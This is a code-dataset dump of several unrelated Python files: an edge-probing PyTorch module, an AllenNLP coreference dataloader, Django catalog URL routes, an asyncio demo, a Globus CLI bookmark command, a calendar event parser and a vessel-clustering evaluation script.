self.span_extractors[1].get_output_dim()\n if not self.single_sided:\n clf_input_dim += self.span_extractors[2].get_output_dim()\n self.classifier = modules.Classifier.from_params(clf_input_dim,\n task.n_classes,\n task_params)\n\n def forward(self, batch: Dict,\n sent_embs: torch.Tensor,\n sent_mask: torch.Tensor,\n task: EdgeProbingTask,\n predict: bool) -> Dict:\n \"\"\" Run forward pass.\n\n Expects batch to have the following entries:\n 'batch1' : [batch_size, max_len, ??]\n 'labels' : [batch_size, num_targets] of label indices\n 'span1s' : [batch_size, num_targets, 2] of spans\n 'span2s' : [batch_size, num_targets, 2] of spans\n\n 'labels', 'span1s', and 'span2s' are padded with -1 along second\n (num_targets) dimension.\n\n Args:\n batch: dict(str -> Tensor) with entries described above.\n sent_embs: [batch_size, max_len, repr_dim] Tensor\n sent_mask: [batch_size, max_len, 1] Tensor of {0,1}\n task: EdgeProbingTask\n predict: whether or not to generate predictions\n\n Returns:\n out: dict(str -> Tensor)\n \"\"\"\n out = {}\n\n batch_size = sent_embs.shape[0]\n out['n_inputs'] = batch_size\n\n # Apply projection CNN layer for each span.\n sent_embs_t = sent_embs.transpose(1, 2) # needed for CNN layer\n se_proj1 = self.projs[1](sent_embs_t).transpose(2, 1).contiguous()\n if not self.single_sided:\n se_proj2 = self.projs[2](sent_embs_t).transpose(2, 1).contiguous()\n\n # Span extraction.\n span_mask = (batch['span1s'][:, :, 0] != -1) # [batch_size, num_targets] bool\n out['mask'] = span_mask\n total_num_targets = span_mask.sum()\n out['n_targets'] = total_num_targets\n out['n_exs'] = total_num_targets # used by trainer.py\n\n _kw = dict(sequence_mask=sent_mask.long(),\n span_indices_mask=span_mask.long())\n # span1_emb and span2_emb are [batch_size, num_targets, span_repr_dim]\n span1_emb = self.span_extractors[1](se_proj1, batch['span1s'], **_kw)\n if not self.single_sided:\n span2_emb = self.span_extractors[2](se_proj2, batch['span2s'], **_kw)\n span_emb = torch.cat([span1_emb, span2_emb], dim=2)\n else:\n span_emb = span1_emb\n\n # [batch_size, num_targets, n_classes]\n logits = self.classifier(span_emb)\n out['logits'] = logits\n\n # Compute loss if requested.\n if 'labels' in batch:\n # Labels is [batch_size, num_targets, n_classes],\n # with k-hot encoding provided by AllenNLP's MultiLabelField.\n # Flatten to [total_num_targets, ...] 
first.\n            out['loss'] = self.compute_loss(logits[span_mask],\n                                            batch['labels'][span_mask],\n                                            task)\n\n        if predict:\n            # Return preds as a list.\n            preds = self.get_predictions(logits)\n            out['preds'] = list(self.unbind_predictions(preds, span_mask))\n\n        return out\n\n    def unbind_predictions(self, preds: torch.Tensor,\n                           masks: torch.Tensor) -> Iterable[np.ndarray]:\n        \"\"\" Unpack preds to varying-length numpy arrays.\n\n        Args:\n            preds: [batch_size, num_targets, ...]\n            masks: [batch_size, num_targets] boolean mask\n\n        Yields:\n            np.ndarray for each row of preds, selected by the corresponding row\n            of span_mask.\n        \"\"\"\n        preds = preds.detach().cpu()\n        masks = masks.detach().cpu()\n        for pred, mask in zip(torch.unbind(preds, dim=0),\n                              torch.unbind(masks, dim=0)):\n            yield pred[mask].numpy() # only non-masked predictions\n\n    def get_predictions(self, logits: torch.Tensor):\n        \"\"\"Return class probabilities, same shape as logits.\n\n        Args:\n            logits: [batch_size, num_targets, n_classes]\n\n        Returns:\n            probs: [batch_size, num_targets, n_classes]\n        \"\"\"\n        if self.loss_type == 'sigmoid':\n            return torch.sigmoid(logits)\n        else:\n            raise ValueError(\"Unsupported loss type '%s' \"\n                             \"for edge probing.\" % self.loss_type)\n\n    def compute_loss(self, logits: torch.Tensor,\n                     labels: torch.Tensor, task: EdgeProbingTask):\n        \"\"\" Compute loss & eval metrics.\n\n        Expect logits and labels to be already \"selected\" for good targets,\n        i.e. this function does not do any masking internally.\n\n        Args:\n            logits: [total_num_targets, n_classes] Tensor of float scores\n            labels: [total_num_targets, n_classes] Tensor of sparse binary targets\n\n        Returns:\n            loss: scalar Tensor\n        \"\"\"\n        binary_preds = logits.ge(0).long()  # {0,1}\n\n        # Matthews coefficient and accuracy computed on {0,1} labels.\n        task.mcc_scorer(binary_preds, labels.long())\n        task.acc_scorer(binary_preds, labels.long())\n\n        # F1Measure() expects [total_num_targets, n_classes, 2]\n        # to compute binarized F1.\n        binary_scores = torch.stack([-1 * logits, logits], dim=2)\n        task.f1_scorer(binary_scores, labels)\n\n        if self.loss_type == 'sigmoid':\n            return F.binary_cross_entropy(torch.sigmoid(logits),\n                                          labels.float())\n        else:\n            raise ValueError(\"Unsupported loss type '%s' \"\n                             \"for edge probing.\" % self.loss_type)\n", "sub_path": "src/modules/edge_probing.py", "file_name": "edge_probing.py", "file_ext": "py", "file_size_in_byte": 9712, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "allennlp.modules.span_extractors.SelfAttentiveSpanExtractor", "line_number": 43, "usage_type": "call"}, {"api_name": "allennlp.modules.span_extractors.EndpointSpanExtractor", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.Conv1d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tasks.edge_probing.EdgeProbingTask", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 152, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 176, 
"usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 177, "usage_type": "attribute"}, {"api_name": "torch.unbind", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 191, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 177, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 177, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 194, "usage_type": "attribute"}, {"api_name": "torch.sigmoid", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 210, "usage_type": "attribute"}, {"api_name": "tasks.edge_probing.EdgeProbingTask", "line_number": 210, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 235, "usage_type": "name"}, {"api_name": "torch.sigmoid", "line_number": 235, "usage_type": "call"}]}
+{"seq_id": "643663724", "text": "from typing import List, Dict, Union, Iterator\nimport random\nfrom copy import deepcopy\n\nimport torch\nfrom torch.utils import data\n\nfrom allennlp.common.registrable import Registrable\nfrom allennlp.common.lazy import Lazy\nfrom allennlp.data import Token, Vocabulary\nfrom allennlp.data.fields import TextField, SpanField, ListField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.batch import Batch\nfrom allennlp.data.samplers import Sampler, BatchSampler\nfrom allennlp.data.dataloader import allennlp_collate, TensorDict, DataLoader\n\n\ndef sentence_removal_collate(vocab: Vocabulary, instances: List[Instance], probability_of_modified_text: float = 1) -> TensorDict:\n augmented_instances = []\n for instance in instances:\n sentences = instance[\"metadata\"][\"sentences\"]\n removed_sentence_index = random.randint(0, len(sentences)-1)\n removed_sentence_length = len(sentences[removed_sentence_index])\n modified_sentences = sentences[:removed_sentence_index]+sentences[removed_sentence_index+1:]\n words = [Token(word) for sentence in modified_sentences for word in sentence]\n sentence_index_span_map = instance[\"metadata\"][\"sentence_index_span_map\"]\n spans = [span for sent_index in range(removed_sentence_index) for span in sentence_index_span_map[sent_index]]+[(span[0]-removed_sentence_length, span[1]-removed_sentence_length) for sent_index in range(removed_sentence_index+1, len(sentences)) for span in sentence_index_span_map[sent_index]]\n if len(spans) > 0 and len(sentences) > 1 and random.random() < probability_of_modified_text:\n instance.add_field(\"modified_text\", TextField(words, instance[\"text\"]._token_indexers))\n spans = [SpanField(span[0], span[1], instance[\"modified_text\"]) for span in spans]\n instance.add_field(\"modified_spans\", ListField(spans))\n instance[\"metadata\"].metadata[\"removed_text_start\"] = sum(len(s) for s in sentences[:removed_sentence_index])\n instance[\"metadata\"].metadata[\"removed_text_end\"] = instance[\"metadata\"].metadata[\"removed_text_start\"]+removed_sentence_length\n instance[\"metadata\"].metadata[\"modified_span_indices\"] = [i for i in range(len(instance[\"spans\"].field_list)) if instance[\"spans\"].field_list[i].span_start < instance[\"metadata\"].metadata[\"removed_text_start\"] or instance[\"spans\"].field_list[i].span_start >= instance[\"metadata\"].metadata[\"removed_text_end\"]]\n instance[\"modified_text\"].index(vocab)\n instance[\"metadata\"].metadata[\"modified_text_loss\"] = True\n augmented_instances.append(instance)\n instance2 = deepcopy(instance)\n instance2[\"metadata\"].metadata[\"modified_text_loss\"] = False\n augmented_instances.append(instance2)\n else:\n instance.add_field(\"modified_text\", instance[\"text\"])\n instance.add_field(\"modified_spans\", instance[\"spans\"])\n instance[\"metadata\"].metadata[\"modified_span_indices\"] = list(range(len(instance[\"spans\"].field_list)))\n instance[\"metadata\"].metadata[\"modified_text_loss\"] = True\n augmented_instances.append(instance)\n\n batch = Batch(augmented_instances)\n return batch.as_tensor_dict(batch.get_padding_lengths())\n\n\n@DataLoader.register(\"coref_dataloader\", constructor=\"from_partial_objects\")\nclass CorefDataLoader(data.DataLoader, DataLoader):\n \"\"\"\n A registrable version of the pytorch\n [DataLoader](https://pytorch.org/docs/stable/data.html#torch.utils.data.DataLoader).\n Firstly, this class exists is so that we can construct a DataLoader\n from a configuration file and have a 
different default `collate_fn`.\n You can use this class directly in python code, but it is identical to using\n pytorch dataloader with allennlp's custom collate function:\n\n ```\n from torch.utils.data import DataLoader\n\n from allennlp.data import allennlp_collate\n # Construct a dataloader directly for a dataset which contains allennlp\n # Instances which have _already_ been indexed.\n my_loader = DataLoader(dataset, batch_size=32, collate_fn=allennlp_collate)\n ```\n\n Secondly, this class adds a `batches_per_epoch` parameter which, if given, determines the number\n of batches after which an epoch ends. If this is `None`, then an epoch is set to be one full pass\n through your data. You might use this if you have a very large dataset and want more frequent\n checkpoints and evaluations on validation data, for instance.\n\n In a typical AllenNLP configuration file, the `dataset` parameter does not get an entry under\n the \"data_loader\", it gets constructed separately.\n \"\"\"\n\n def __init__(\n self,\n dataset: data.Dataset,\n batch_size: int = 1,\n shuffle: bool = False,\n sampler: Sampler = None,\n batch_sampler: BatchSampler = None,\n num_workers: int = 0,\n # NOTE: The default for collate_fn is different from the normal `None`.\n # We assume that if you are using this class you are using an\n # allennlp dataset of instances, which would require this.\n collate_fn=sentence_removal_collate,\n pin_memory: bool = False,\n drop_last: bool = False,\n timeout: int = 0,\n worker_init_fn=None,\n multiprocessing_context: str = None,\n batches_per_epoch: int = None,\n probability_of_modified_text: float = 1\n ):\n collate_fn = lambda x: sentence_removal_collate(vocab=batch_sampler.vocab, instances=x, probability_of_modified_text=probability_of_modified_text)\n super().__init__(\n dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n sampler=sampler,\n batch_sampler=batch_sampler,\n num_workers=num_workers,\n collate_fn=collate_fn,\n pin_memory=pin_memory,\n drop_last=drop_last,\n timeout=timeout,\n worker_init_fn=worker_init_fn,\n multiprocessing_context=multiprocessing_context,\n )\n self._data_generator = super().__iter__()\n self._batches_per_epoch = batches_per_epoch\n\n def __len__(self):\n if self._batches_per_epoch is not None:\n return self._batches_per_epoch\n return super().__len__()*2\n\n def slice_dict(self, dictionary, slice_index, slice_size):\n slice_dictionary = {}\n for key in dictionary:\n if isinstance(dictionary[key], Dict):\n field_slice = self.slice_dict(dictionary[key], slice_index, slice_size)\n else:\n field_slice = dictionary[key][slice_index:slice_index+slice_size]\n slice_dictionary[key] = field_slice\n return slice_dictionary\n\n def __iter__(self):\n if self._batches_per_epoch is None:\n # NOTE: since torch's DataLoader is listed as the first super class of this class,\n # super().__iter__() will resolve to the __iter__ method from torch's DataLoader,\n # which is what we want.\n # yield from super().__iter__()\n iterator = super().__iter__()\n for batch in iterator:\n arbitrary_key = None\n for key in batch:\n if not isinstance(batch[key], Dict):\n arbitrary_key = key\n batch_length = len(batch[arbitrary_key])\n for i in range(0, batch_length, 1):\n smaller_batch = self.slice_dict(batch, i, 1)\n yield smaller_batch\n else:\n for i in range(self._batches_per_epoch):\n try:\n yield next(self._data_generator)\n except StopIteration: # data_generator is exhausted\n self._data_generator = super().__iter__() # so refresh it\n yield 
next(self._data_generator) # and yield required instance\n\n @classmethod\n def from_partial_objects(\n cls,\n dataset: data.Dataset,\n batch_size: int = 1,\n shuffle: bool = False,\n sampler: Lazy[Sampler] = None,\n batch_sampler: Lazy[BatchSampler] = None,\n num_workers: int = 0,\n pin_memory: bool = False,\n drop_last: bool = False,\n timeout: int = 0,\n worker_init_fn=None,\n multiprocessing_context: str = None,\n batches_per_epoch: int = None,\n probability_of_modified_text: float = 1,\n ) -> \"CorefDataLoader\":\n batch_sampler_ = (\n None if batch_sampler is None else batch_sampler.construct(data_source=dataset)\n )\n sampler_ = None if sampler is None else sampler.construct(data_source=dataset)\n batch_size = batch_sampler_.batch_size\n\n return cls(\n dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n sampler=sampler_,\n batch_sampler=batch_sampler_,\n num_workers=num_workers,\n # NOTE: The default for collate_fn is different from the normal `None`.\n # We assume that if you are using this class you are using an\n # allennlp dataset of instances, which would require this.\n collate_fn=sentence_removal_collate,\n pin_memory=pin_memory,\n drop_last=drop_last,\n timeout=timeout,\n worker_init_fn=worker_init_fn,\n multiprocessing_context=multiprocessing_context,\n batches_per_epoch=batches_per_epoch,\n probability_of_modified_text=probability_of_modified_text\n )\n", "sub_path": "allennlp_models/coref/coref_dataloader.py", "file_name": "coref_dataloader.py", "file_ext": "py", "file_size_in_byte": 9582, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "allennlp.data.Vocabulary", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "allennlp.data.instance.Instance", "line_number": 18, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "allennlp.data.Token", "line_number": 25, "usage_type": "call"}, {"api_name": "random.random", "line_number": 28, "usage_type": "call"}, {"api_name": "allennlp.data.fields.TextField", "line_number": 29, "usage_type": "call"}, {"api_name": "allennlp.data.fields.SpanField", "line_number": 30, "usage_type": "call"}, {"api_name": "allennlp.data.fields.ListField", "line_number": 31, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 38, "usage_type": "call"}, {"api_name": "allennlp.data.batch.Batch", "line_number": 48, "usage_type": "call"}, {"api_name": "allennlp.data.dataloader.TensorDict", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 53, "usage_type": "name"}, {"api_name": "allennlp.data.dataloader.DataLoader", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 82, "usage_type": "name"}, {"api_name": "allennlp.data.samplers.Sampler", "line_number": 85, "usage_type": "name"}, {"api_name": "allennlp.data.samplers.BatchSampler", "line_number": 86, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 126, "usage_type": "argument"}, {"api_name": "typing.Dict", "line_number": 143, "usage_type": "argument"}, {"api_name": "torch.utils.data.Dataset", "line_number": 160, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 160, "usage_type": 
"name"}, {"api_name": "allennlp.common.lazy.Lazy", "line_number": 163, "usage_type": "name"}, {"api_name": "allennlp.data.samplers.Sampler", "line_number": 163, "usage_type": "name"}, {"api_name": "allennlp.common.lazy.Lazy", "line_number": 164, "usage_type": "name"}, {"api_name": "allennlp.data.samplers.BatchSampler", "line_number": 164, "usage_type": "name"}, {"api_name": "allennlp.data.dataloader.DataLoader.register", "line_number": 52, "usage_type": "call"}, {"api_name": "allennlp.data.dataloader.DataLoader", "line_number": 52, "usage_type": "name"}]}
+{"seq_id": "580499907", "text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'catalog'\n\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n\n url(r'^books/$', views.BookListView.as_view(), name=\"books-list\"),\n url(r'^book/(?P\\d{1,6})$', views.BookDetailView.as_view(), name=\"book-detail\"),\n url(r'^book/create$', views.BookCreate.as_view(), name='book-create'),\n url(r'^book/(?P\\d{1,6})/update$', views.BookUpdate.as_view(), name='book-update'),\n url(r'^book/(?P\\d{1,6})/delete$', views.BookDelete.as_view(), name='book-delete'),\n url(r'^book/(?P[-0-9a-f]{36})/renew$', views.renew_book_librarian, name=\"renew-book-librarian\"),\n\n url(r'^authors/$', views.AuthorListView.as_view(), name=\"authors-list\"),\n url(r'^author/(?P\\d{1,6})$', views.AuthorDetailView.as_view(), name=\"author-detail\"),\n url(r'^author/create$', views.AuthorCreate.as_view(), name='author-create'),\n url(r'^author/(?P\\d{1,6})/update$', views.AuthorUpdate.as_view(), name='author-update'),\n url(r'^author/(?P\\d{1,6})/delete$', views.AuthorDelete.as_view(), name='author-delete'),\n\n url(r'^mybooks/$', views.LoanedBooksByUserListView.as_view(), name=\"user-loaned\"),\n\n url(r'^all-loans/$', views.AllLoanedBooks.as_view(), name=\"all-loaned\"),\n]\n", "sub_path": "catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1272, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "102510520", "text": "#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n\n\nimport threading \nimport asyncio \n\n\ndef wget(host):\n\tprint ('hello world %s' % host)\n\tyield from asyncio.sleep(1)\n\tprint ('hello angin(%s)' % threading.currentThread())\n\n\nw_list=['www.163.com','www.sohu.com','www.sina.com']\nloop = asyncio.get_event_loop()\ntasks = [wget(host) for host in w_list]\nloop.run_until_complete(asyncio.wait(tasks))\nloop.close()\n\n\n", "sub_path": "stu_lxf_python/generator/coroutine_web.py", "file_name": "coroutine_web.py", "file_ext": "py", "file_size_in_byte": 404, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "asyncio.sleep", "line_number": 12, "usage_type": "call"}, {"api_name": "threading.currentThread", "line_number": 13, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 17, "usage_type": "call"}, {"api_name": "asyncio.wait", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "247191859", "text": "import click\nfrom globus_sdk import TransferAPIError\n\nfrom globus_cli.parsing import common_options\nfrom globus_cli.safeio import formatted_print\nfrom globus_cli.services.transfer import (\n display_name_or_cname,\n get_client,\n iterable_response_to_dict,\n)\n\n\n@click.command(\"list\", help=\"List bookmarks for the current user\")\n@common_options\ndef bookmark_list():\n \"\"\"\n Executor for `globus bookmark list`\n \"\"\"\n client = get_client()\n\n bookmark_iterator = client.bookmark_list()\n\n def get_ep_name(item):\n ep_id = item[\"endpoint_id\"]\n try:\n ep_doc = client.get_endpoint(ep_id)\n return display_name_or_cname(ep_doc)\n except TransferAPIError as err:\n if err.code == \"EndpointDeleted\":\n return \"[DELETED ENDPOINT]\"\n else:\n raise err\n\n formatted_print(\n bookmark_iterator,\n fields=[\n (\"Name\", \"name\"),\n (\"Bookmark ID\", \"id\"),\n (\"Endpoint ID\", \"endpoint_id\"),\n (\"Endpoint Name\", get_ep_name),\n (\"Path\", \"path\"),\n ],\n response_key=\"DATA\",\n json_converter=iterable_response_to_dict,\n )\n", "sub_path": "globus_cli/commands/bookmark/list.py", "file_name": "list.py", "file_ext": "py", "file_size_in_byte": 1194, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "globus_cli.services.transfer.get_client", "line_number": 19, "usage_type": "call"}, {"api_name": "globus_cli.services.transfer.display_name_or_cname", "line_number": 27, "usage_type": "call"}, {"api_name": "globus_sdk.TransferAPIError", "line_number": 28, "usage_type": "name"}, {"api_name": "globus_cli.safeio.formatted_print", "line_number": 34, "usage_type": "call"}, {"api_name": "globus_cli.services.transfer.iterable_response_to_dict", "line_number": 44, "usage_type": "name"}, {"api_name": "click.command", "line_number": 13, "usage_type": "call"}, {"api_name": "globus_cli.parsing.common_options", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "317690675", "text": "from cal.models import CFPBCalendar, CFPBCalendarEvent\nfrom datetime import date, datetime\n\nclass ProcessEvent(object):\n\n # pass in an icalendar event and the calendar table that was queried\n def __init__(self, event ,calendar_record):\n self.event = event\n\n self.e = CFPBCalendarEvent()\n\n self.e.calendar = calendar_record\n\n self.num_dupes = 0\n\n self.saved_event = False\n\n self._process()\n\n # get rid of unicode and formatting issues\n def _clean_string(self,s):\n\n s = s.encode('ascii', 'ignore')\n s = str(s).replace('\\\\n', '').replace('\\\\,', ',')\n\n return s\n\n # convert the datetime to string and remove any timezone info\n def _clean_date(self,d):\n\n d = str(d).replace('Z', '')\n d = d.encode('ascii', 'ignore')\n d = d.split(\"+\")[0]\n\n return d\n\n # figure out if this event is assigned for all day\n def _is_all_day(self):\n\n start = datetime.strptime(self.e.dtstart.split(\" \")[0], \"%Y-%m-%d\")\n end = datetime.strptime(self.e.dtend.split(\" \")[0], \"%Y-%m-%d\")\n\n diff = start - end\n\n all_day = (diff.days == -1)\n\n setattr(self.e, \"all_day\", all_day)\n\n # dynamically set the value of the calendar object from the event data\n def _set_value(self, i):\n\n if i in ('DTSTART', 'DTEND', 'DTSTAMP', 'CREATED'):\n v = self._clean_date( self.event.decoded(i) )\n\n elif i in ('DESCRIPTION', 'SUMMARY', 'LOCATION'):\n v = self._clean_string(self.event[i])\n\n else:\n v = self.event[i]\n\n setattr(self.e, i.lower(), v)\n\n # make sure uid is unqiue - this is do to recurring events sharing the same uid\n def _create_unique_id(self):\n\n temp = str(self.e.uid)+'@'+str(self.e.dtstart).replace(\" \",\"\").replace(\":\",\"\").replace(\"-\",\"\")\n\n self.e.uid=temp\n\n # let the magic happen\n def _process(self):\n\n for i in self.event.keys():\n self._set_value(i)\n\n if self.e.summary == None:\n summary_fill = CFPBCalendarEvent.objects.filter(uid__contains=self.e.uid ) #uid=self.e.uid, summary__isnull=False)\n\n if summary_fill:\n self.e.summary = summary_fill[0].summary\n\n if self.e.dtstamp == None:\n self.e.dtstamp = self._clean_date(self.event.decoded(\"RECURRENCE-ID\"))\n\n if self.e.location == None:\n self.e.location = \" \"\n\n self._is_all_day()\n\n self._create_unique_id()\n\n dupes = CFPBCalendarEvent.objects.filter(uid=self.e.uid, dtstamp=self.e.dtstamp)\n\n self.num_dupes = len(dupes)\n\n def save(self):\n if self.num_dupes == 0:\n self.e.save()\n self.saved_event = True", "sub_path": "cfgov/cal/event.py", "file_name": "event.py", "file_ext": "py", "file_size_in_byte": 2724, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "cal.models.CFPBCalendarEvent", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "name"}, {"api_name": "cal.models.CFPBCalendarEvent.objects.filter", "line_number": 77, "usage_type": "call"}, {"api_name": "cal.models.CFPBCalendarEvent.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "cal.models.CFPBCalendarEvent", "line_number": 77, "usage_type": "name"}, {"api_name": "cal.models.CFPBCalendarEvent.objects.filter", "line_number": 92, "usage_type": "call"}, {"api_name": "cal.models.CFPBCalendarEvent.objects", 
"line_number": 92, "usage_type": "attribute"}, {"api_name": "cal.models.CFPBCalendarEvent", "line_number": 92, "usage_type": "name"}]}
+{"seq_id": "628824441", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript to evaluate prediction accuracy\r\n\r\n@author: Kevin S. Xu\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import adjusted_rand_score\r\n\r\nfrom utils import loadData, plotVesselTracks\r\nfrom predictVessel import predictWithK, predictWithoutK\r\n\r\n#%% Load training and test data. Training data may not necessarily be used.\r\ntestData = loadData('set2noVID.csv')\r\ntestFeatures = testData[:,2:]\r\ntestLabels = testData[:,1]\r\ntrainData = loadData('set1.csv')\r\ntrainFeatures = trainData[:,2:]\r\ntrainLabels = trainData[:,1]\r\n\r\n#%% Run prediction algorithms and check accuracy\r\nnumVessels = np.unique(testLabels).size\r\npredVesselsWithK = predictWithK(testFeatures, numVessels, trainFeatures, \r\n trainLabels)\r\n# Check to ensure that there are at most K vessels. If not, set adjusted\r\n# Rand index to -infinity to indicate an invalid result (0 accuracy score)\r\nif np.unique(predVesselsWithK).size > numVessels:\r\n ariWithK = -np.inf\r\nelse:\r\n ariWithK = adjusted_rand_score(testLabels, predVesselsWithK)\r\n\r\npredVesselsWithoutK = predictWithoutK(testFeatures, trainFeatures, trainLabels)\r\npredNumVessels = np.unique(predVesselsWithoutK).size\r\nariWithoutK = adjusted_rand_score(testLabels, predVesselsWithoutK)\r\n\r\nprint(f'Adjusted Rand index given K = {numVessels}: {ariWithK}')\r\nprint(f'Adjusted Rand index for estimated K = {predNumVessels}: '\r\n + f'{ariWithoutK}')\r\n\r\n#%% Plot vessel tracks colored by prediction and actual labels\r\nplt.ion()\r\nplotVesselTracks(testFeatures[:,[2,1]], predVesselsWithK)\r\nplt.title('Vessel tracks by cluster with K')\r\nplotVesselTracks(testFeatures[:,[2,1]], predVesselsWithoutK)\r\nplt.title('Vessel tracks by cluster without K')\r\nplotVesselTracks(testFeatures[:,[2,1]], testLabels)\r\nplt.title('Vessel tracks by label')\r\n", "sub_path": "evaluatePredictor.py", "file_name": "evaluatePredictor.py", "file_ext": "py", "file_size_in_byte": 1843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "utils.loadData", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.loadData", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 24, "usage_type": "call"}, {"api_name": "predictVessel.predictWithK", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.adjusted_rand_score", "line_number": 32, "usage_type": "call"}, {"api_name": "predictVessel.predictWithoutK", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.metrics.adjusted_rand_score", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "utils.plotVesselTracks", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.plotVesselTracks", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 47, "usage_type": "name"}, {"api_name": "utils.plotVesselTracks", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]}
